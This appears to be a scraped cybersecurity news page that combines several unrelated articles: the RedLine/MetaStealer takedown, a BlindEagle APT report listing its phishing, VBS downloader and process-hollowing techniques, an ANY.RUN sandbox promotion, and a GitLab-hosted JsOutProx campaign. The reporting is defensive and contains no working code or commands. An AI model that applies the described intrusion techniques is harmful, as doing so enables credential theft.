1200 Servers Of RedLine & META Infostealers Seized By Authorities
Dutch police, working with partners from around the world, have made an important achievement by shutting down two well-known groups responsible for stealing information. These groups are called RedLine and MetaStealer. This is a big step in fighting cybercrime.
The operation, codenamed “Operation Magnus,” took place on October 28, 2024, and involved authorities from the United States, the United Kingdom, Belgium, Portugal, and Australia.
The takedown resulted in the shutdown of three servers in the Netherlands and the confiscation of two domains. Authorities estimate that over 1,200 servers across dozens of countries were involved in running the malware.
The operation led to the arrest of two individuals in Belgium, one of whom remains in custody. U.S. authorities have filed charges against an administrator.
Strategies to Defend Websites & APIs from Malware Attack -> Free Webinar
RedLine and MetaStealer are information-stealing malware that target sensitive data such as passwords, login credentials, and personally identifiable information.
These tools have been crucial in the cybercrime ecosystem, allowing threat actors to harvest valuable data for further attacks or sale on criminal marketplaces.
The Dutch National Police gained full access to the criminals’ back-end infrastructure, including source code, license servers, API servers, panels, and Telegram bots.
This access has provided law enforcement with valuable information about the malware’s users, including usernames, passwords, IP addresses, and registration dates.
Security researchers estimate that RedLine alone was responsible for stealing over 170 million passwords in just the last six months. The malware has been active since at least 2020 and was often distributed through phishing emails or malicious downloads.
As investigations continue, authorities are expected to take further legal actions against individuals involved in using and distributing these malware strains.
This operation serves as a stark warning to cybercriminals that law enforcement agencies are becoming increasingly effective at disrupting their activities, even in spaces where they previously felt untouchable.
New APT Group BlindEagle Attacking Multiple Organizations Via Weaponized Emails
BlindEagle (APT-C-36) is a Latin American Advanced Persistent Threat group that has been active since 2018. It targets the governmental, financial, and energy sectors in Colombia, Ecuador, Chile, Panama, and other regional countries.
BlindEagle is known for employing straightforward yet impactful techniques; the group demonstrates versatility in switching between financially motivated attacks and espionage operations.
Cybersecurity researchers at Kaspersky Lab recently identified this new group, which was found to be attacking multiple organizations via weaponized emails.
APT Group BlindEagle Attacking Organizations
BlindEagle, an advanced threat actor, carries out multi-stage attacks, which start with phishing emails disguised as government and financial institutions.
Phishing impersonating the Attorney General’s Office (Source – Securelist)
To avoid detection, their campaigns apply geolocation-based filtering through URL shorteners so that they can only reach specific regions.
Free Webinar on Detecting & Blocking Supply Chain Attack -> Book your Spot
Typically, the initial infection vector is compressed files in different formats, including some less popular ones like LHA or UUE, which contain Visual Basic Scripts.
These scripts use WScript, XMLHTTP objects, or PowerShell to download further payloads from attacker-controlled servers or public platforms such as Pastebin or GitHub.
The group’s malware deployment advances through a number of stages incorporating encoded or obfuscated artifacts often exploiting steganography techniques and topping in modified open-source Remote Access Trojans (RATs).
Steganography used in a BlindEagle campaign (Source – Securelist)
It is possible to tell by the different RATs like njRAT, LimeRAT, BitRAT, and AsyncRAT that the group uses by frequently switching between them in line with specific campaigns’ goals such as stealing money via the internet or cyber espionage.
They use process injection techniques, mainly process hollowing, to avoid being detected where the last payload is executed on legitimate processes’ memory space.
The team modifies their RATs with improved information collection abilities, additional plugin installation features, and, in some cases, a special capability of intercepting bank account credentials developed, showing how they can fit them according to victims’ requirements or what exactly each campaign intends to achieve, reads the report.
BlindEagle was previously recognized as using simple tactics such as basic phishing and off-the-shelf malware. But more recently, the group has demonstrated more complex methods against its targets.
In May 2023, they conducted a campaign that included artifacts with Portuguese language characteristics and employed Brazilian image-hosting sites, possibly showing cooperation with other groups.
In the following month, there was an attack in June where the DLL sideloading technique was used, and HijackLoader, a new modular malware loader, was unleashed.
TTPs
Here below we have mentioned all the TTPs:-
Phishing
Malicious Attachments
URL Shorteners
Dynamic DNS
Public Infrastructure
Process Hollowing
VBS Scripts/.NET Assemblies
Open-source RATs
Phishing emails purporting to be from Colombian judicial institutions start these attacks with malicious PDF or DOCX attachments containing files that appear legitimate but trick victims into downloading and running them.
While Colombia remains an important destination for them, with 87% of victims located there, BlindEagle also operates in Ecuador, Chile, and Panama.
Various areas, including government, education, health, and transport, are affected by their campaigns.BlindEagle continues to represent a serious threat in the area through its repeated implementation of cyber-espionage as well as financial credential theft campaigns.
Are you from SOC and DFIR Teams? Analyse Malware Incidents & get live Access with ANY.RUN -> Get 14 Days Free Acces
Automate Analysis of Common Attack Vectors with a Malware Sandbox
Analysts often face an overwhelming number of threats daily, each demanding a detailed examination to understand its behavior and potential impact.
When alerts start piling up, manually analyzing each one becomes time-consuming and puts your team under pressure.
Fortunately, these threats can be handled faster and more efficiently with automated malware analysis. By automating various tasks, you can uncover threats quicker, minimize errors, and free up your team to focus on more critical work.
CAPTCHAs are often used by attackers to add an additional layer of complexity to malicious activity, requiring user interaction to proceed.
These challenges can hinder manual analysis by slowing down the investigation process.
In automated analysis sessions, CAPTCHAs are solved automatically without requiring any manual input. The analysis process continues smoothly, and all stages of the attack are executed.
For example, in this analysis session, CAPTCHAs encountered during a phishing attack are bypassed automatically, allowing the sandbox to detect and observe the subsequent steps in the attack chain.
Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar
This approach simplifies the analysis and provides a complete view of the threat, saving analysts time and effort.
QR Codes: A New Gateway for Malware
QR codes have become popular in modern interactions, from payments to marketing. However, they are also a delivery mechanism for malware.
A malicious QR code can direct users to phishing sites or trick them into downloading malware onto their devices.
Cybercriminals often embed QR codes in documents. However, tools like ANY.RUN’s sandbox ensures these obstacles are bypassed during automated analysis sessions, uncovering the hidden threats.
As seen in this analysis session, the detection of malware doesn’t stop or require manual effort when encountering a QR code. The sandbox automatically detects and opens the embedded link, keeping the analysis session uninterrupted.
During the threat analysis, the sandbox also determines if the content is malicious and displays the verdict in the upper-right corner of the interface, saving both time and effort for analysts.
Email Attachments: The Classic Attack Vector
Email attachments continue to be a popular method for distributing malware. Threat actors often hide malicious payloads in files such as ZIP archives, requiring specific actions or multiple steps to execute the attack.
Automated analysis speeds up this process by extracting, opening, and observing the behavior of potential threats in a secure, isolated environment.
In the following sample, we see how easy it is to automate the analysis of email attachments with the help of an interactive sandbox.
With automated analysis, the sandbox extracts the ZIP file attached to the email. Then, it finds the Formbook executable inside the archive and runs it automatically to observe its behavior.
Blocked Links: Extracting Hidden URLs
Blocked or rewritten links are commonly used by cybercriminals to bypass security filters. These links appear harmless but redirect to malicious destinations once clicked, making them a dangerous tool for phishing and malware delivery.
Automated analysis in a sandbox environment is ideal for handling such scenarios.
Tools like ANY.RUN can simulate user behavior, extract these hidden URLs, and follow them in a controlled environment. This process ensures that the final destination and any associated threats are exposed without putting real systems at risk.
For example, in a sandbox session analyzing a blocked phishing URL, the link appeared rewritten to Microsoft’s domain safelinks[.]protection[.]outlook[.]com with a warning indicating the link was malicious.
However, this block prevented further insight into the threat.
By enabling Automated Interactivity and rerunning the analysis, the sandbox bypassed the rewritten URL, allowing all stages of the attack to execute, including those requiring CAPTCHA-solving.
This revealed that the attack was conducted by the Storm-1575 threat actor using the DadSec phishing platform, as indicated by the associated tags.
Get Your Exclusive Black Friday Deals from ANY.RUN
Enhance your threat analysis capabilities with ANY.RUN’s powerful sandbox. Quickly analyze emails, files, and URLs to detect cyber threats.
With automated analysis, the sandbox takes care of every step, saving you time and delivering accurate insights without the need for manual input.
Black Friday Offers from ANY.RUN
Take advantage of special Black Friday deals, available until December 8:
For individual users: Get 2 licenses for the price of 1.
For teams: Receive up to 3 licenses plus an annual basic plan for Threat Intelligence Lookup, a searchable threat intelligence database from ANY.RUN -> Explore all offers today.
Analyze cyber threats with ANYRUN's powerful sandbox. Black Friday Deals : Get up to 3 Free Licenses.
JsOutProx Malware Abusing GitLab To Attack Financial Institutions
[[{“value”:”
GitLab is a prominent web-based Git repository manager that is exploited by hackers to gain unauthorized access to confidential source code, steal intellectual property or insert malicious code into projects that are hosted on GitLab.
Gitlab’s software vulnerabilities or misconfigurations in their deployment can serve as an initial point of an attack from which the whole system can be breached and other networks or systems connected to this one could be targeted.
A new variation of JSOutProx emerged as a stealthy attack framework that combines JavaScript and .NET components.
It is aimed at financial institutions in the APAC and MENA areas, using .NET serialization to foster malicious JavaScript code on compromised systems.
This modular malware, which SOLAR SPIDER has initially associated with phishing campaigns since 2019, can also incorporate plugins meant for malicious actions after an initial intrusion.
JsOutProx Malware Abusing GitLab
A surge in activity was detected around February 8, 2024, when a Saudi Arabian system integrator reported an incident targeting the customers of a major regional bank.
Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .
The campaign impersonated “mike.will@my[.]com” and employed fake SWIFT/Moneygram payment notifications to deliver malicious payloads.
Besides this, Resecurity aided multiple victims through DFIR engagements, recovering the malware used in these impersonation attacks aimed at banking customers across enterprises and individuals.
Initially reported in November 2023, Solar Spider has hosted payloads on GitHub repositories. But for JavaScript code, instead of that, they use PDF files to make their malware look like.
The group shifted from a preference for GitHub to GitLab repositories when Resecurity discovered a new sample from this group utilizing GitLab repositories on March 27, 2024, designed as a multi-stage infection chain.
Activity detected (Source – Resecurity)
On the 25th of March, 2024, several GitLab accounts that belonged to this actor were registered to host malicious payloads in repositories such as “docs909” (established on April 2) and “dox05” (established on March 26).
This rotating repository tactic probably assists in maintaining different payloads for various victims.
After delivering the malware successfully, the actor deletes the repository and opens another.
It is noteworthy that Resecurity secured the latest payloads uploaded on April 2nd, 2024, throwing light upon a developing GitLab campaign.
To detect, prevent, and mitigate JSOutProx RAT malware that has hidden JavaScript backdoors, which are not easy to understand, and contains modules with command execution capacity, file operations capability, persistence mechanisms, screen capturing functionalities, and system control.
One exceptional point is how it employs the Cookie header while communicating with C2s.
Resecurity downloaded the deobfuscated implants from archived payloads, and its analysts found some decoded JavaScript codes for further analysis and defensive measures.
The first stage implant has functionalities that allow it to update, set proxy/sleep times, execute processes, evaluate JavaScript, and exit.
It interacts with ActiveXObject, a Windows Script Host object used for malicious automation tasks. The second stage adds other plug-ins that broaden the malware’s range of functions.
Moreover, the continuously evolving malware exhibits an organized development effort, attacking high-profile victims in government and finance sectors with customized lures.
Is Your Network Under Attack? – Read CISO’s Guide to Avoiding the Next Breach – Download Free Guide